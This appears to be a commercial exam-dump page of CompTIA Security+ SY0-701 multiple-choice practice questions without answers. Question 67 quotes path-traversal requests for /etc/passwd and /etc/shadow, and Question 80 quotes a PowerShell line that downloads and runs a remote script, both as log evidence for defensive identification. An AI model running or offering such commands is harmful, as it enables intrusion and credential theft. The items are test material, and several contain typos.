Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: clap70

SY0-701 CompTIA Security+ Exam 2026 Questions and Answers

Questions 4

Which of the following is the greatest advantage that network segmentation provides?

Options:

A.

End-to-end encryption

B.

Decreased resource utilization

C.

Enhanced endpoint protection

D.

Configuration enforcement

E.

Security zones

Buy Now
Questions 5

Which of the following best represents an application that does not have an on-premises requirement and is accessible from anywhere?

Options:

A.

Pass

B.

Hybrid cloud

C.

Private cloud

D.

IaaS

E.

SaaS

Buy Now
Questions 6

An organization is evaluating the cost of licensing a new solution to prevent ransomware. Which of the following is the most helpful in making this decision?

Options:

A.

ALE

B.

SLE

C.

RTO

D.

ARO

Buy Now
Questions 7

Which of the following are the best security controls for controlling on-premises access? (Select two.)

Options:

A.

Swipe card

B.

Picture ID

C.

Phone authentication application

D.

Biometric scanner

E.

Camera

F.

Memorable

Buy Now
Questions 8

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

Options:

A.

Air gap

B.

Containerization

C.

Virtualization

D.

Decentralization

Buy Now
Questions 9

A security analyst wants to automate a task that shares data between systems. Which of the following is the best option for the analyst to use?

Options:

A.

SOAR

B.

API

C.

SFTP

D.

RDP

Buy Now
Questions 10

Which of the following security threats aims to compromise a website that multiple employees frequently visit?

Options:

A.

Supply chain

B.

Typosquatting

C.

Watering hole

D.

Impersonation

Buy Now
Questions 11

Which of the following is a type of vulnerability that may result from outdated algorithms or keys?

Options:

A.

Hash collision

B.

Cryptographic

C.

Buffer overflow

D.

Input validation

Buy Now
Questions 12

Which of the following would be the best solution to deploy a low-cost standby site that includes hardware and internet access?

Options:

A.

Recovery site

B.

Cold site

C.

Hot site

D.

Warm site

Buy Now
Questions 13

Which of the following activities are associated with vulnerability management? (Select two).

Options:

A.

Reporting

B.

Prioritization

C.

Exploiting

D.

Correlation

E.

Containment

F.

Tabletop exercise

Buy Now
Questions 14

During a routine audit, an analyst discovers that a department uses software that was not vetted. Which threat is this?

Options:

A.

Espionage

B.

Data exfiltration

C.

Shadow IT

D.

Zero-day

Buy Now
Questions 15

A company wants to use new Wi-Fi-enabled environmental sensors in order to automatically collect metrics. Which of the following will the security team most likely do?

Options:

A.

Add the sensor software to the risk register.

B.

Create a VLAN for the sensors.

C.

Physically air gap the sensors.

D.

Configure TLS 1.2 on all sensors.

Buy Now
Questions 16

Which of the following best describe a penetration test that resembles an actual external attach?

Options:

A.

Known environment

B.

Partially known environment

C.

Bug bounty

D.

Unknown environment

Buy Now
Questions 17

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

Options:

A.

Availability

B.

Non-repudiation

C.

Integrity

D.

Confidentiality

Buy Now
Questions 18

A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?

Options:

A.

MDM

B.

CYOD

C.

PED

D.

COPE

Buy Now
Questions 19

Which of the following describes how a risk event might affect operations and limit the overall risk score?

Options:

A.

Severity

B.

Likelihood

C.

Impact

D.

Probability

Buy Now
Questions 20

Which of the following is most likely in a responsibility matrix in a cloud computing environment?

Options:

A.

The customer is responsible for information and data regardless of the cloud model used.

B.

The cloud provider is responsible for account and identity management for connected devices.

C.

The customer and the cloud provider share responsibility for the physical network infrastructure.

D.

The cloud provider is responsible for the security of endpoints connected to the infrastructure.

Buy Now
Questions 21

Which of the following security controls are a company implementing by deploying HIPS? (Select two).

Options:

A.

Directive

B.

Preventive

C.

Physical

D.

Corrective

E.

Compensating

F.

Detective

Buy Now
Questions 22

A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a quarterly report detailing the number of incidents that impacted the organization. The systems administrator is creating a way to present the data to the board of directors. Which of the following should the systems administrator use?

Options:

A.

Packet captures

B.

Vulnerability scans

C.

Metadata

D.

Dashboard

Buy Now
Questions 23

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

Options:

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are use

Buy Now
Questions 24

Following a security review, an organization must ensure users verify their identities against the company ' s identity services with individual credentials leveraging WPA2-Enterprise for wireless access. Which of the following configuration steps correctly applies RADIUS in this environment?

Options:

A.

Enabling 802.1X authentication and integrating it with the corporate directory

B.

Installing self-signed certificates on all user devices

C.

Enabling MAC filters for all wireless clients

D.

Configuring the wireless controller to require multifactor authentication

Buy Now
Questions 25

Which of the following principles ensures data is only accessible to authorized users?

Options:

A.

Integrity

B.

Confidentiality

C.

Non-repudiation

D.

Availability

Buy Now
Questions 26

Which of the following would a security administrator use to comply with a secure baseline during a patch update?

Options:

A.

Information security policy

B.

Service-level expectations

C.

Standard operating procedure

D.

Test result report

Buy Now
Questions 27

A network administrator deploys an FDE solution on all end user workstations. Which of the following data protection strategies does this describe?

Options:

A.

Masking

B.

Data in transit

C.

Obfuscation

D.

Data at rest

E.

Data sovereignty

Buy Now
Questions 28

A company discovers suspicious transactions that were entered into the company ' s database and attached to a user account that was created as a trap for malicious activity. Which of the following is the user account an example of?

Options:

A.

Honeytoken

B.

Honeynet

C.

Honeypot

D.

Honeyfile

Buy Now
Questions 29

Which of the following best explains how open service ports increase an organization ' s attack surface?

Options:

A.

They are commonly overlooked by endpoint antivirus tools during scans.

B.

They can make the company’s remote entry point available to the internet.

C.

They enable automatic application updates to reduce vulnerability windows.

D.

They can expose unnecessary services to unauthorized access if not properly restricted.

Buy Now
Questions 30

During a risk treatment exercise, an administrator discovers a risk that cannot be mitigated. Which of the following best describes this situation?

Options:

A.

Residual risk

B.

Risk appetite

C.

Reviewed risk

D.

Risk register

Buy Now
Questions 31

A security administrator wants to implement a security information and event management system. The administrator must first collect network traffic on the switch to gain visibility of the network. Which of the following is the most appropriate method?

Options:

A.

Syslog

B.

Port mirroring

C.

Port forwarding

D.

Load balancer logs

Buy Now
Questions 32

A security administrator is addressing an issue with a legacy system that communicates data using an unencrypted protocol to transfer sensitive data to a third party. No software updates that use an encrypted protocol are available, so a compensating control is needed. Which of the following are the most appropriate for the administrator to suggest? (Select two.)

Options:

A.

Tokenization

B.

Cryptographic downgrade

C.

SSH tunneling

D.

Segmentation

E.

Patch installation

F.

Data masking

Buy Now
Questions 33

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simu-lation, please click the Reset All button.

Options:

Buy Now
Questions 34

A security engineer is installing an IPS to block signature-based attacks in the environment. Which of the following modes will best accomplish this task?

Options:

A.

Monitor

B.

Sensor

C.

Audit

D.

Active

Buy Now
Questions 35

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Options:

A.

Private

B.

Critical

C.

Sensitive

D.

Public

Buy Now
Questions 36

A company ' s accounting department receives an urgent payment message from the company ' s bank domain with instructions to wire transfer funds. The sender requests that the transfer be completed as soon as possible. Which of the following attacks is described?

Options:

A.

Business email compromise

B.

Vishing

C.

Spear phishing

D.

Impersonation

Buy Now
Questions 37

Which of the following is an example of a data protection strategy that uses tokenization?

Options:

A.

Encrypting databases containing sensitive data

B.

Replacing sensitive data with surrogate values

C.

Removing sensitive data from production systems

D.

Hashing sensitive data in critical systems

Buy Now
Questions 38

Which of the following provides the best protection against unwanted or insecure communications to and from a device?

Options:

A.

System hardening

B.

Host-based firewall

C.

Intrusion detection system

D.

Anti-malware software

Buy Now
Questions 39

Client files can only be accessed by employees who need to know the information and have specified roles in the company. Which of the following best describes this security concept?

Options:

A.

Availability

B.

Confidentiality

C.

Integrity

D.

Non-repudiation

Buy Now
Questions 40

Which of the following would be the best way to test resiliency in the event of a primary power failure?

Options:

A.

Parallel processing

B.

Tabletop exercise

C.

Simulation testing

D.

Production failover

Buy Now
Questions 41

A company ' s accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and sends the payment to the new account. Days later, the clerk receives another message from the same vendor with a request for a missing payment to the original bank account. Which of the following has most likely occurred?

Options:

A.

Phishing campaign

B.

Data exfiltration

C.

Pretext calling

D.

Business email compromise

Buy Now
Questions 42

Which of the following is the best safeguard to protect against an extended power failure?

Options:

A.

Off-site backups

B.

Batteries

C.

Uninterruptible power supplies

D.

Generators

Buy Now
Questions 43

An organization determines that tenured employees have retained privileges beyond those required to perform their duties. Which of the following should the organization do to address the issue?

Options:

A.

Implement regular account reviews.

B.

Provide privileged user account training.

C.

Require a jump box for privileged account use.

D.

Apply more restrictive security baselines.

Buy Now
Questions 44

A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive customer data. Which of the following should the administrator do first?

Options:

A.

Block access to cloud storage websites.

B.

Create a rule to block outgoing email attachments.

C.

Apply classifications to the data.

D.

Remove all user permissions from shares on the file server.

Buy Now
Questions 45

Which of the following steps in the risk management process involves establishing the scope and potential risks involved with a project?

Options:

A.

Risk mitigation

B.

Risk identification

C.

Risk treatment

D.

Risk monitoring and review

Buy Now
Questions 46

Which of the following best explains the use of a policy engine in a Zero Trust environment?

Options:

A.

It is used by a central server to apply default permissions across a range of network and computing resources.

B.

It is used to make access control decisions without inheriting permission decisions from prior events.

C.

It is used to dynamically assign user permissions based on a user ' s identity and previous activity.

D.

It is used when user roles are unknown and the organization wants to leverage ML to control access.

Buy Now
Questions 47

A company wants to ensure that a mission-critical database can only be accessed from specific internal IP addresses. Which of the following should the company deploy to meet this requirement?

Options:

A.

Web application firewall

B.

Network tap

C.

Intrusion prevention system

D.

Jump server

Buy Now
Questions 48

Which of the following describes the category of data that is most impacted when it is lost?

Options:

A.

Confidential

B.

Public

C.

Private

D.

Critical

Buy Now
Questions 49

Which of the following is the best reason to complete an audit in a banking environment?

Options:

A.

Regulatory requirement

B.

Organizational change

C.

Self-assessment requirement

D.

Service-level requirement

Buy Now
Questions 50

Which of the following are the best methods for hardening end user devices? (Select two)

Options:

A.

Full disk encryption

B.

Group-level permissions

C.

Account lockout

D.

Endpoint protection

E.

Proxy server

F.

Segmentation

Buy Now
Questions 51

A Chief Information Security Officer would like to conduct frequent, detailed reviews of systems and procedures to track compliance objectives. Which of the following is the best method to achieve this objective?

Options:

A.

Third-party attestation

B.

Penetration testing

C.

Internal auditing

D.

Vulnerability scans

Buy Now
Questions 52

While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following assessment types should be performed during software development to prevent this from reoccurring?

Options:

A.

Vulnerability scan

B.

Penetration test

C.

Static analysis

D.

Quality assurance

Buy Now
Questions 53

Which of the following should be used to select a label for a file based on the file ' s value, sensitivity, or applicable regulations?

Options:

A.

Verification

B.

Certification

C.

Classification

D.

Inventory

Buy Now
Questions 54

Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?

Options:

A.

Disablement of unused services

B.

Web application firewall

C.

Host isolation

D.

Network-based IDS

Buy Now
Questions 55

A security practitioner completes a vulnerability assessment on a company ' s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

Options:

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

Buy Now
Questions 56

A systems administrate wants to implement a backup solution. the solution needs to allow recovery of the entire system, including the operating system, in case of a disaster. Which of the following backup types should the administrator consider?

Options:

A.

Incremental

B.

Storage area network

C.

Differential

D.

Image

Buy Now
Questions 57

A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the company need to secure to best achieve this goal?

Options:

A.

IaaS

B.

SCADA

C.

SDN

D.

IoT

Buy Now
Questions 58

Which of the following would be the most appropriate way to protect data in transit?

Options:

A.

SHA-256

B.

SSL 3.0

C.

TLS 1.3

D.

AES-256

Buy Now
Questions 59

A systems administrator discovers a system that is no longer receiving support from the vendor. However, this system and its environment are critical to running the business, cannot be modified, and must stay online. Which of the following risk treatments is the most appropriate in this situation?

Options:

A.

Refect

B.

Accept

C.

Transfer

D.

Avoid

Buy Now
Questions 60

Which of the following is required for an organization to properly manage its restore process in the event of system failure?

Options:

A.

IRP

B.

DRP

C.

RPO

D.

SDLC

Buy Now
Questions 61

A newly identified network access vulnerability has been found in the OS of legacy loT devices. Which of the following would best mitigate this vulnerability quickly?

Options:

A.

Insurance

B.

Patching

C.

Segmentation

D.

Replacement

Buy Now
Questions 62

Which of the following considerations is the most important for an organization to evaluate as it establishes and maintains a data privacy program?

Options:

A.

Reporting structure for the data privacy officer

B.

Request process for data subject access

C.

Role as controller or processor

D.

Physical location of the company

Buy Now
Questions 63

A company identified the potential for malicious insiders to harm the organization. Which of the following measures should the organization implement to reduce this risk?

Options:

A.

Unified threat management

B.

Web application firewall

C.

User behavior analytics

D.

Intrusion detection system

Buy Now
Questions 64

Which of the following involves an attempt to take advantage of database misconfigurations?

Options:

A.

Buffer overflow

B.

SQL injection

C.

VM escape

D.

Memory injection

Buy Now
Questions 65

A security engineer receives reports of unauthorized devices on the organization ' s network. Which of the following best describes a secure and effective way to mitigate the risks?

Options:

A.

Deploy a NAC solution to block wireless connections until devices can be verified against the baseline configuration.

B.

Set the NAC solution to only accept handshakes initiated from a static set of IP addresses.

C.

Configure a NAC solution to enforce 802.1X authentication with device certificates and implement endpoint security checks.

D.

Implement a NAC solution that redirects all devices to the guest Wi-Fi for holding until a security analyst can validate the security compliance.

Buy Now
Questions 66

Which of the following can best contribute to prioritizing patch applications?

Options:

A.

CVSS

B.

SCAP

C.

OSINT

D.

CVE

Buy Now
Questions 67

A security analyst receives an alert from a web server that contains the following logs:

GET /image?filename=../../../etc/passwd

Host: AcmeInc.web.net

useragent: python-request/2.27.1

GET /image?filename=../../../etc/shadow

Host: AcmeInc.web.net

useragent: python-request/2.27.1

Which of the following attacks is being attempted?

Options:

A.

File injection

B.

Privilege escalation

C.

Directory traversal

D.

Cookie forgery

Buy Now
Questions 68

A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the process and revisit the general terms every three years. Which of the following documents would provide the best way to set the general terms?

Options:

A.

MSA

B.

NDA

C.

MOU

D.

SLA

Buy Now
Questions 69

A security professional discovers a folder containing an employee ' s personal information on the enterprise ' s shared drive. Which of the following best describes the data type the securityprofessional should use to identify organizational policies and standards concerning the storage of employees ' personal information?

Options:

A.

Legal

B.

Financial

C.

Privacy

D.

Intellectual property

Buy Now
Questions 70

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?

Options:

A.

If the wildcard certificate is configured

B.

If the certificate signing request is valid

C.

If the root certificate is installed

D.

If the public key is configured

Buy Now
Questions 71

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO ' s report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Buy Now
Questions 72

A legacy device is being decommissioned and is no longer receiving updates or patches. Which of the following describes this scenario?

Options:

A.

End of business

B.

End of testing

C.

End of support

D.

End of life

Buy Now
Questions 73

Which of the following agreements defines response time, escalation, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Buy Now
Questions 74

An organization conducts a self-evaluation with a phishing campaign that requests login credentials. The organization receives the following results:

• None of the staff were fooled by the attempt due to proper security awareness.

• Staff deleted the email without performing any additional actions.

Which of the following security practices would add the most value to the organization?

Options:

A.

Implement a strict password reset policy for all senior managers after a security event.

B.

Update user guidance to include suspicious incident reporting.

C.

Conduct end-user training regarding spear-phishing attempts to raise awareness.

D.

Require remote workers to use a VPN when connecting to the organization ' s networks.

Buy Now
Questions 75

A security administrator needs to reduce the attack surface in the company ' s data centers. Which of the following should the security administrator do to complete this task?

Options:

A.

Implement a honeynet.

B.

Define Group Policy on the servers.

C.

Configure the servers for high availability.

D.

Upgrade end-of-support operating systems.

Buy Now
Questions 76

An organization is leveraging a VPN between its headquarters and a branch location. Which of the following is the VPN protecting?

Options:

A.

Data in use

B.

Data in transit

C.

Geographic restrictions

D.

Data sovereignty

Buy Now
Questions 77

An organization is developing a security program that conveys the responsibilities associated with the general operation of systems and software within the organization. Which of the following documents would most likely communicate these expectations?

Options:

A.

Business continuity plan

B.

Change management procedure

C.

Acceptable use policy

D.

Software development life cycle policy

Buy Now
Questions 78

A security team wants WAF policies to be automatically created when applications are deployed. Which concept describes this capability?

Options:

A.

IaC

B.

IoT

C.

IoC

D.

IaaS

Buy Now
Questions 79

Which of the following types of identification methods can be performed on a deployed application during runtime?

Options:

A.

Dynamic analysis

B.

Code review

C.

Package monitoring

D.

Bug bounty

Buy Now
Questions 80

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

Options:

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

Buy Now
Questions 81

An engineer needs to find a solution that creates an added layer of security by preventing unauthorized access to internal company resources. Which of the following would be the best solution?

Options:

A.

RDP server

B.

Jump server

C.

Proxy server

D.

Hypervisor

Buy Now
Questions 82

An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints ' definitions are up to date. Which of the following will these actions most effectively prevent?

Options:

A.

Zero-day attacks

B.

Insider threats

C.

End-of-life support

D.

Known exploits

Buy Now
Questions 83

Which of the following factors are the most important to address when formulating a training curriculum plan for a security awareness program? (Select two).

Options:

A.

Channels by which the organization communicates with customers

B.

The reporting mechanisms for ethics violations

C.

Threat vectors based on the industry in which the organization operates

D.

Secure software development training for all personnel

E.

Cadence and duration of training events

F.

Retraining requirements for individuals who fail phishing simulations

Buy Now
Questions 84

An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?

Options:

A.

Input validation

B.

NGFW

C.

Vulnerability scan

D.

WAF

Buy Now
Questions 85

An administrator must replace an expired SSL certificate. Which of the following does the administrator need to create the new SSL certificate?

Options:

A.

CSR

B.

OCSP

C.

Key

D.

CRL

Buy Now
Questions 86

Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and requirements of the country of origin?

Options:

A.

Data sovereignty

B.

Geolocation

C.

Intellectual property

D.

Geographic restrictions

Buy Now
Questions 87

Which of the following actions is best performed by ticketing automation to ensure that incidents receive the correct level of attention and response?

Options:

A.

Notification

B.

Creation

C.

Closure

D.

Escalation

Buy Now
Questions 88

A university employee logged on to the academic server and attempted to guess the system administrators ' log-in credentials. Which of the following security measures should the university have implemented to detect the employee ' s attempts to gain access to the administrators ' accounts?

Options:

A.

Two-factor authentication

B.

Firewall

C.

Intrusion prevention system

D.

User activity logs

Buy Now
Questions 89

A company prevented direct access from the database administrators’ workstations to the network segment that contains database servers. Which of the following should a database administrator use to access the database servers?

Options:

A.

Jump server

B.

RADIUS

C.

HSM

D.

Load balancer

Buy Now
Questions 90

A company decides to purchase an insurance policy. Which of the following risk management strategies is this company implementing?

Options:

A.

Mitigate

B.

Accept

C.

Avoid

D.

Transfer

Buy Now
Questions 91

Which of the following methods to secure credit card data is best to use when a requirement is to see only the last four numbers on a credit card?

Options:

A.

Encryption

B.

Hashing

C.

Masking

D.

Tokenization

Buy Now
Questions 92

Which of the following control types is AUP an example of?

Options:

A.

Physical

B.

Managerial

C.

Technical

D.

Operational

Buy Now
Questions 93

A business uses Wi-Fi with content filleting enabled. An employee noticed a coworker accessed a blocked sue from a work computer and repotted the issue. While Investigating the issue, a security administrator found another device providing internet access to certain employees. Which of the following best describes the security risk?

Options:

A.

The host-based security agent Is not running on all computers.

B.

A rogue access point Is allowing users to bypass controls.

C.

Employees who have certain credentials are using a hidden SSID.

D.

A valid access point is being jammed to limit availability.

Buy Now
Questions 94

Which of the following best describes why me SMS DIP authentication method is more risky to implement than the TOTP method?

Options:

A.

The SMS OTP method requires an end user to have an active mobile telephone service and SIM card.

B.

Generally. SMS OTP codes are valid for up to 15 minutes while the TOTP time frame is 30 to 60 seconds

C.

The SMS OTP is more likely to be intercepted and lead to unauthorized disclosure of the code than the TOTP method.

D.

The algorithm used to generate on SMS OTP code is weaker than the one used to generate a TOTP code

Buy Now
Questions 95

A systems administrator set up a perimeter firewall but continues to notice suspicious connections between internal endpoints. Which of the following should be set up in order to mitigate the threat posed by the suspicious activity?

Options:

A.

Host-based firewall

B.

Web application firewall

C.

Access control list

D.

Application allow list

Buy Now
Questions 96

An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial systems. Which of the following is the most likely reason for the new requirement?

Options:

A.

To defend against insider threats altering banking details

B.

To ensure that errors are not passed to other systems

C.

To allow for business insurance to be purchased

D.

To prevent unauthorized changes to financial data

Buy Now
Questions 97

A company is implementing a vendor ' s security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company ' s standard user directory. Which of the following should the company implement?

Options:

A.

802.1X

B.

SAML

C.

RADIUS

D.

CHAP

Buy Now
Questions 98

Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?

Options:

A.

Mitigate

B.

Accept

C.

Transfer

D.

Avoid

Buy Now
Questions 99

Which of the following can a security director use to prioritize vulnerability patching within a company ' s IT environment?

Options:

A.

SOAR

B.

CVSS

C.

SIEM

D.

CVE

Buy Now
Questions 100

Which of the following threat actors would most likely deface the website of a high-profile music group?

Options:

A.

Unskilled attacker

B.

Organized crime

C.

Nation-state

D.

Insider threat

Buy Now
Questions 101

Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data. Which of the following is the type of data these employees are most likely to use in day-to-day work activities?

Options:

A.

Encrypted

B.

Intellectual property

C.

Critical

D.

Data in transit

Buy Now
Questions 102

Which of the following should a security analyst consider when prioritizing remediation efforts against known vulnerabilities?

Options:

A.

The impact of reporting to executive management

B.

The overall organizational risk tolerance

C.

Information gathered from open sources

D.

The source of the reported risk

Buy Now
Questions 103

A Chief Security Officer signs off on a request to allow inbound SMB and RDP from the internet to a single VLAN. Which of the following is the most likely explanation for this activity?

Options:

A.

The company built a new file-sharing site.

B.

The organization is preparing for a penetration test.

C.

The security team is integrating with an SASE platform.

D.

The security team created a honeynet.

Buy Now
Questions 104

An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavior. Which of the following should the CISO do first?

Options:

A.

Update the acceptable use policy.

B.

Deploy a password management solution.

C.

Issue warning letters to affected users.

D.

Implement a phishing awareness campaign.

Buy Now
Questions 105

Alerts from email protection systems and MSSPs must be entered into an IT service management system and assigned to the security team. Which of the following should an organization implement to enable this functionality?

Options:

A.

Automated compliance monitoring

B.

Automated ticket creation

C.

Automated vulnerability scans

D.

Automated indicator sharing

Buy Now
Questions 106

A company ' s website is www. Company. com Attackers purchased the domain wwww. company.com Which of the following types of attacks describes this example?

Options:

A.

Typosquatting

B.

Brand Impersonation

C.

On-path

D.

Watering-hole

Buy Now
Questions 107

A security administrator recently reset local passwords and the following values were recorded in the system:

Which of the following in the security administrator most likely protecting against?

Options:

A.

Account sharing

B.

Weak password complexity

C.

Pass-the-hash attacks

D.

Password compromise

Buy Now
Questions 108

A user would like to install software and features that are not available with a smartphone ' s default software. Which of the following would allow the user to install unauthorized software and enable new features?

Options:

A.

SOU

B.

Cross-site scripting

C.

Jailbreaking

D.

Side loading

Buy Now
Questions 109

A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the following types of sites should the engineer consider?

Options:

A.

Recovery site

B.

Hot site

C.

Cold site

D.

Warm site

Buy Now
Questions 110

A company wants to update its disaster recovery plan to include a dedicated location for immediate continued operations if a catastrophic event occurs. Which of the following options is best to include in the disaster recovery plan?

Options:

A.

Hot site

B.

Warm site

C.

Geolocation

D.

Cold site

Buy Now
Questions 111

An attacker used XSS to compromise a web server. Which of the following solutions could have been used to prevent this attack?

Options:

A.

NGFW

B.

UTM

C.

WAF

D.

NAC

Buy Now
Questions 112

A company uses multiple providers to send its marketing, internal, and support emails. Many of the emails are marked as spam. Which of the following changes should the company make to ensure legitimate emails are validated?

Options:

A.

Disable DKIM to avoid signature conflicts.

B.

Implement DMARC with a " reject " policy to enforce sender validation.

C.

Replace the domain ' s MX record with the marketing provider ' s services.

D.

Update the SPF record to include all authorized sending sources.

Buy Now
Questions 113

Which of the following is a prerequisite for a DLP solution?

Options:

A.

Data destruction

B.

Data sanitization

C.

Data classification

D.

Data masking

Buy Now
Questions 114

Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?

Options:

A.

Compliance reporting

B.

GDPR

C.

Due diligence

D.

Attestation

Buy Now
Questions 115

Which of the following solutions would most likely be used in the financial industry to mask sensitive data?

Options:

A.

Tokenization

B.

Hashing

C.

Salting

D.

Steganography

Buy Now
Questions 116

A human resources (HR) employee working from home leaves their company laptop open on the kitchen table. A family member walking through the kitchen reads an email from the Chief Financial Officer addressed to the HR department. The email contains information referencing company layoffs. The family member posts the content of the email to social media. Which of the following policies will the HR employee most likely need to review after this incident?

Options:

A.

Hybrid work environment

B.

Operations security

C.

Data loss prevention

D.

Social engineering

Buy Now
Questions 117

An organization has issues with deleted network share data and improper permissions. Which solution helps track and remediate these?

Options:

A.

DLP

B.

EDR

C.

FIM

D.

ACL

Buy Now
Questions 118

A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?

Options:

A.

End user training

B.

Policy review

C.

URL scanning

D.

Plain text email

Buy Now
Questions 119

Which of the following is the best way to remove personal data from a social media account that is no longer being used?

Options:

A.

Exercise the right to be forgotten

B.

Uninstall the social media application

C.

Perform a factory reset

D.

Terminate the social media account

Buy Now
Questions 120

Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach affecting offshore offices. Which of the following is this an example of?

Options:

A.

Tabletop exercise

B.

Penetration test

C.

Geographic dispersion

D.

Incident response

Buy Now
Questions 121

A Chief Information Officer wants to ensure that network devices cannot connect to the public internet or the local network to directly perform firmware updates. The IT team must manually perform the update process by using a portable device. Which of the following architecture types best fits this description?

Options:

A.

Microservices

B.

Air-gapped

C.

Software-defined networking

D.

Serverless

Buy Now
Questions 122

The analyst wants to move data from production to the UAT server for testing the latest release. Which of the following strategies to protect data should the analyst use?

Options:

A.

Data masking

B.

Data tokenization

C.

Data obfuscation

D.

Data encryption

Buy Now
Questions 123

A security team installs an IPS on an organization ' s network and needs to configure the system to detect and prevent specific network attacks. Which of the following settings should the team configure first within the IPS?

Options:

A.

Allow list policies

B.

Packet Inspection

C.

Logging and reporting

D.

Firewall rules

Buy Now
Questions 124

A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch jobs locally and does not generate traffic, but the process is now generating outbound traffic over random high ports. Which of the following vulnerabilities has likely been exploited in this software?

Options:

A.

Memory injection

B.

Race condition

C.

Side loading

D.

SQL injection

Buy Now
Questions 125

Which of the following is a compensating control for providing user access to a high-risk website?

Options:

A.

Enabling threat prevention features on the firewall

B.

Configuring a SIEM tool to capture all web traffic

C.

Setting firewall rules to allow traffic from any port to that destination

D.

Blocking that website on the endpoint protection software

Buy Now
Questions 126

The Chief Information Security Officer (CISO) has determined the company is non-compliant with local data privacy regulations. The CISO needs to justify the budget request for more resources. Which of the following should the CISO present to the board as the direct consequence of non-compliance?

Options:

A.

Fines

B.

Reputational damage

C.

Sanctions

D.

Contractual implications

Buy Now
Questions 127

A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:

Time | IP address | Location | EmpID | App | Status

14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success

14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure

14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success

14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success

Which of the following is being displayed in the logs?

Options:

A.

Impossible travel

B.

SMTP replay

C.

Directory traversal

D.

Cross-site request forgery

Buy Now
Questions 128

An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security team to configure on the MDM before allowing access to corporate resources?

Options:

A.

Device fingerprinting

B.

Compliance attestation

C.

NAC

D.

802.1X

Buy Now
Questions 129

Which of the following practices would be best to prevent an insider from introducing malicious code into a company ' s development process?

Options:

A.

Code scanning for vulnerabilities

B.

Open-source component usage

C.

Quality assurance testing

D.

Peer review and approval

Buy Now
Questions 130

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofed website. Which of the following should the administrator do?

Options:

A.

Deploy multifactor authentication.

B.

Decrease the level of the web filter settings

C.

Implement security awareness training.

D.

Update the acceptable use policy

Buy Now
Questions 131

Which of the following steps in the incident response process involves developing a hypothesis of possible attack paths and using various sources to confirm or deny the hypothesis?

Options:

A.

Identification

B.

Investigation

C.

Containment

D.

Preparation

Buy Now
Questions 132

Which of the following describes the difference between encryption and hashing?

Options:

A.

Encryption protects data in transit, while hashing protects data at rest.

B.

Encryption replaces cleartext with ciphertext, while hashing calculates a checksum.

C.

Encryption ensures data integrity, while hashing ensures data confidentiality.

D.

Encryption uses a public-key exchange, while hashing uses a private key.

Buy Now
Questions 133

A company ' s antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on investigations but cannot determine a root cause. The company is looking for a heuristic solution. Which of the following should replace the antivirus solution?

Options:

A.

SIEM

B.

EDR

C.

DLP

D.

IDS

Buy Now
Questions 134

Which of the following best explains a concern with OS-based vulnerabilities?

Options:

A.

An exploit would give an attacker access to system functions that span multiple applications.

B.

The OS vendor ' s patch cycle is not frequent enough to mitigate the large number of threats.

C.

Most users trust the core operating system features and may not notice if the system has been compromised.

D.

Exploitation of an operating system vulnerability is typically easier than any other vulnerability.

Buy Now
Questions 135

